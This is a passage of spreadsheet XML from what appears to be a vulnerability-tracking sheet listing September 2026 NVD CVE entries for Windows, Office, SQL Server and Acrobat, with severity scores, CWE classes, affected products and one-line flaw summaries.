t="inlineStr" /><c r="H1286" s="5" t="n"><v>0.004</v></c><c r="I1286" s="5" t="inlineStr" /><c r="J1286" s="5" t="inlineStr" /><c r="K1286" s="5" t="inlineStr" /><c r="L1286" s="5" t="inlineStr" /><c r="M1286" s="5" t="inlineStr" /><c r="N1286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1286" s="5" t="inlineStr" /><c r="R1286" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1286" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t></is></c></row><row r="1287"><c r="A1287" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1287" s="5" t="inlineStr"><is><t>CVE-2026-69808</t></is></c><c r="D1287" s="5" t="n"><v>5.5</v></c><c r="E1287" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1287" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1287" s="5" t="inlineStr" /><c r="H1287" s="5" t="n"><v>0.004</v></c><c r="I1287" s="5" t="inlineStr" /><c r="J1287" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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87" s="5" t="inlineStr" /><c r="M1287" s="5" t="inlineStr" /><c r="N1287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1287" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1287" s="5" t="inlineStr" /><c r="R1287" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1287" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t></is></c></row><row r="1288"><c r="A1288" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1288" s="5" t="inlineStr"><is><t>CVE-2026-69862</t></is></c><c r="D1288" s="5" t="n"><v>5.5</v></c><c r="E1288" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1288" s="5" t="inlineStr" /><c r="H1288" s="5" t="n"><v>0.005</v></c><c r="I1288" s="5" t="inlineStr" /><c r="J1288" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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88" s="5" t="inlineStr" /><c r="M1288" s="5" t="inlineStr" /><c r="N1288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1288" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1288" s="5" t="inlineStr" /><c r="R1288" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S1288" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t></is></c></row><row r="1289"><c r="A1289" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1289" s="5" t="inlineStr"><is><t>CVE-2026-70145</t></is></c><c r="D1289" s="5" t="n"><v>5.5</v></c><c r="E1289" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1289" s="5" t="inlineStr" /><c r="H1289" s="5" t="n"><v>0.004</v></c><c r="I1289" s="5" t="inlineStr" /><c r="J1289" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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89" s="5" t="inlineStr" /><c r="M1289" s="5" t="inlineStr" /><c r="N1289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1289" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1289" s="5" t="inlineStr" /><c r="R1289" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1289" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t></is></c></row><row r="1290"><c r="A1290" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1290" s="5" t="inlineStr"><is><t>CVE-2026-70290</t></is></c><c r="D1290" s="5" t="n"><v>5.5</v></c><c r="E1290" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1290" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1290" s="5" t="inlineStr" /><c r="H1290" s="5" t="n"><v>0.004</v></c><c r="I1290" s="5" t="inlineStr" /><c r="J1290" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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90" s="5" t="inlineStr" /><c r="M1290" s="5" t="inlineStr" /><c r="N1290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1290" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1290" s="5" t="inlineStr" /><c r="R1290" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1290" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t></is></c><c r="T1290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t></is></c></row><row r="1291"><c r="A1291" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1291" s="5" t="inlineStr"><is><t>CVE-2026-71341</t></is></c><c r="D1291" s="5" t="n"><v>5.5</v></c><c r="E1291" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1291" s="5" t="inlineStr" /><c r="H1291" s="5" t="n"><v>0.004</v></c><c r="I1291" s="5" t="inlineStr" /><c r="J1291" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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91" s="5" t="inlineStr" /><c r="M1291" s="5" t="inlineStr" /><c r="N1291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1291" s="5" t="inlineStr" /><c r="R1291" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1291" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t></is></c></row><row r="1292"><c r="A1292" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1292" s="5" t="inlineStr"><is><t>CVE-2026-72937</t></is></c><c r="D1292" s="5" t="n"><v>5.5</v></c><c r="E1292" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1292" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1292" s="5" t="inlineStr" /><c r="H1292" s="5" t="n"><v>0.004</v></c><c r="I1292" s="5" t="inlineStr" /><c r="J1292" s="5" t="inlineStr" /><c r="K1292" s="5" t="inlineStr" /><c r="L1292" s="5" t="inlineStr" /><c r="M1292" s="5" t="inlineStr" /><c r="N1292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1292" s="5" t="inlineStr" /><c r="R1292" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1292" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t></is></c></row><row r="1293"><c r="A1293" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1293" s="5" t="inlineStr"><is><t>CVE-2026-72945</t></is></c><c r="D1293" s="5" t="n"><v>5.5</v></c><c r="E1293" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1293" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1293" s="5" t="inlineStr" /><c r="H1293" s="5" t="n"><v>0.004</v></c><c r="I1293" s="5" t="inlineStr" /><c r="J1293" s="5" t="inlineStr" /><c r="K1293" s="5" t="inlineStr" /><c r="L1293" s="5" t="inlineStr" /><c r="M1293" s="5" t="inlineStr" /><c r="N1293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1293" s="5" t="inlineStr" /><c r="R1293" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1293" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t></is></c><c r="T1293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t></is></c></row><row r="1294"><c r="A1294" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1294" s="5" t="inlineStr"><is><t>CVE-2026-72964</t></is></c><c r="D1294" s="5" t="n"><v>5.5</v></c><c r="E1294" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1294" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1294" s="5" t="inlineStr" /><c r="H1294" s="5" t="n"><v>0.003</v></c><c r="I1294" s="5" t="inlineStr" /><c r="J1294" s="5" t="inlineStr" /><c r="K1294" s="5" t="inlineStr" /><c r="L1294" s="5" t="inlineStr" /><c r="M1294" s="5" t="inlineStr" /><c r="N1294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1294" s="5" t="inlineStr" /><c r="R1294" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1294" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t></is></c></row><row r="1295"><c r="A1295" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1295" s="5" t="inlineStr"><is><t>CVE-2026-72966</t></is></c><c r="D1295" s="5" t="n"><v>5.5</v></c><c r="E1295" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1295" s="5" t="inlineStr" /><c r="H1295" s="5" t="n"><v>0.003</v></c><c r="I1295" s="5" t="inlineStr" /><c r="J1295" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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95" s="5" t="inlineStr" /><c r="M1295" s="5" t="inlineStr" /><c r="N1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1295" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1295" s="5" t="inlineStr" /><c r="R1295" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1295" s="5" t="inlineStr"><is><t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t></is></c></row><row r="1296"><c r="A1296" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1296" s="5" t="inlineStr"><is><t>CVE-2026-72980</t></is></c><c r="D1296" s="5" t="n"><v>5.5</v></c><c r="E1296" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1296" s="5" t="inlineStr" /><c r="H1296" s="5" t="n"><v>0.003</v></c><c r="I1296" s="5" t="inlineStr" /><c r="J1296" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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96" s="5" t="inlineStr" /><c r="M1296" s="5" t="inlineStr" /><c r="N1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1296" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1296" s="5" t="inlineStr" /><c r="R1296" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S1296" s="5" t="inlineStr"><is><t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t></is></c></row><row r="1297"><c r="A1297" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1297" s="5" t="inlineStr"><is><t>CVE-2026-73004</t></is></c><c r="D1297" s="5" t="n"><v>5.5</v></c><c r="E1297" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1297" s="5" t="inlineStr" /><c r="H1297" s="5" t="n"><v>0.002</v></c><c r="I1297" s="5" t="inlineStr" /><c r="J1297" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1297" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1297" s="5" t="inlineStr" /><c r="M1297" s="5" t="inlineStr" /><c r="N1297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1297" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1297" s="5" t="inlineStr" /><c r="R1297" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1297" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t></is></c></row><row r="1298"><c r="A1298" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1298" s="5" t="inlineStr"><is><t>CVE-2026-73008</t></is></c><c r="D1298" s="5" t="n"><v>5.5</v></c><c r="E1298" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1298" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1298" s="5" t="inlineStr" /><c r="H1298" s="5" t="n"><v>0.005</v></c><c r="I1298" s="5" t="inlineStr" /><c r="J1298" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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98" s="5" t="inlineStr" /><c r="M1298" s="5" t="inlineStr" /><c r="N1298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1298" s="5" t="inlineStr" /><c r="R1298" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1298" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t></is></c></row><row r="1299"><c r="A1299" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1299" s="5" t="inlineStr"><is><t>CVE-2026-77488</t></is></c><c r="D1299" s="5" t="n"><v>5.5</v></c><c r="E1299" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1299" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1299" s="5" t="inlineStr" /><c r="H1299" s="5" t="n"><v>0.003</v></c><c r="I1299" s="5" t="inlineStr" /><c r="J1299" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1299" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1299" s="5" t="inlineStr" /><c r="M1299" s="5" t="inlineStr" /><c r="N1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1299" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1299" s="5" t="inlineStr" /><c r="R1299" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1299" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t></is></c></row><row r="1300"><c r="A1300" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1300" s="5" t="inlineStr"><is><t>CVE-2026-77491</t></is></c><c r="D1300" s="5" t="n"><v>5.5</v></c><c r="E1300" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1300" s="5" t="inlineStr" /><c r="H1300" s="5" t="n"><v>0.004</v></c><c r="I1300" s="5" t="inlineStr" /><c r="J1300" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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300" s="5" t="inlineStr" /><c r="M1300" s="5" t="inlineStr" /><c r="N1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1300" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1300" s="5" t="inlineStr" /><c r="R1300" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1300" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t></is></c></row><row r="1301"><c r="A1301" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1301" s="5" t="inlineStr"><is><t>CVE-2026-77492</t></is></c><c r="D1301" s="5" t="n"><v>5.5</v></c><c r="E1301" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1301" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1301" s="5" t="inlineStr" /><c r="H1301" s="5" t="n"><v>0.003</v></c><c r="I1301" s="5" t="inlineStr" /><c r="J1301" s="5" t="inlineStr" /><c r="K1301" s="5" t="inlineStr" /><c r="L1301" s="5" t="inlineStr" /><c r="M1301" s="5" t="inlineStr" /><c r="N1301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1301" s="5" t="inlineStr" /><c r="R1301" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1301" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t></is></c></row><row r="1302"><c r="A1302" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1302" s="5" t="inlineStr"><is><t>CVE-2026-78454</t></is></c><c r="D1302" s="5" t="n"><v>5.5</v></c><c r="E1302" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1302" s="5" t="inlineStr" /><c r="H1302" s="5" t="n"><v>0.004</v></c><c r="I1302" s="5" t="inlineStr" /><c r="J1302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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302" s="5" t="inlineStr" /><c r="M1302" s="5" t="inlineStr" /><c r="N1302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1302" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1302" s="5" t="inlineStr" /><c r="R1302" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1302" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t></is></c></row><row r="1303"><c r="A1303" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1303" s="5" t="inlineStr"><is><t>CVE-2026-78506</t></is></c><c r="D1303" s="5" t="n"><v>5.5</v></c><c r="E1303" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1303" s="5" t="inlineStr" /><c r="H1303" s="5" t="n"><v>0.005</v></c><c r="I1303" s="5" t="inlineStr" /><c r="J1303" s="5" t="inlineStr" /><c r="K1303" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1303" s="5" t="inlineStr" /><c r="M1303" s="5" t="inlineStr" /><c r="N1303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1303" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1303" s="5" t="inlineStr" /><c r="R1303" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S1303" s="5" t="inlineStr"><is><t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t></is></c></row><row r="1304"><c r="A1304" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1304" s="5" t="inlineStr"><is><t>CVE-2026-78513</t></is></c><c r="D1304" s="5" t="n"><v>5.5</v></c><c r="E1304" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1304" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1304" s="5" t="inlineStr" /><c r="H1304" s="5" t="n"><v>0.005</v></c><c r="I1304" s="5" t="inlineStr" /><c r="J1304" s="5" t="inlineStr" /><c r="K1304" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1304" s="5" t="inlineStr" /><c r="M1304" s="5" t="inlineStr" /><c r="N1304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1304" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1304" s="5" t="inlineStr" /><c r="R1304" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1304" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t></is></c></row><row r="1305"><c r="A1305" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1305" s="5" t="inlineStr"><is><t>CVE-2026-79910</t></is></c><c r="D1305" s="5" t="n"><v>5.5</v></c><c r="E1305" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1305" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1305" s="5" t="inlineStr" /><c r="H1305" s="5" t="n"><v>0.002</v></c><c r="I1305" s="5" t="inlineStr" /><c r="J1305" s="5" t="inlineStr" /><c r="K1305" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1305" s="5" t="inlineStr" /><c r="M1305" s="5" t="inlineStr" /><c r="N1305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1305" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1305" s="5" t="inlineStr" /><c r="R1305" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1305"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05" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t></is></c></row><row r="1306"><c r="A1306" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1306" s="5" t="inlineStr"><is><t>CVE-2026-80160</t></is></c><c r="D1306" s="5" t="n"><v>5.5</v></c><c r="E1306" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1306" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1306" s="5" t="inlineStr" /><c r="H1306" s="5" t="n"><v>0.002</v></c><c r="I1306" s="5" t="inlineStr" /><c r="J1306" s="5" t="inlineStr" /><c r="K1306" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1306" s="5" t="inlineStr" /><c r="M1306" s="5" t="inlineStr" /><c r="N1306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1306" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1306" s="5" t="inlineStr" /><c r="R1306" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1306"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06" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t></is></c></row><row r="1307"><c r="A1307" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1307" s="5" t="inlineStr"><is><t>CVE-2026-80162</t></is></c><c r="D1307" s="5" t="n"><v>5.5</v></c><c r="E1307" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1307" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1307" s="5" t="inlineStr" /><c r="H1307" s="5" t="n"><v>0.002</v></c><c r="I1307" s="5" t="inlineStr" /><c r="J1307" s="5" t="inlineStr" /><c r="K1307" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1307" s="5" t="inlineStr" /><c r="M1307" s="5" t="inlineStr" /><c r="N1307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1307" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1307" s="5" t="inlineStr" /><c r="R1307" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1307" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1307" s="6" 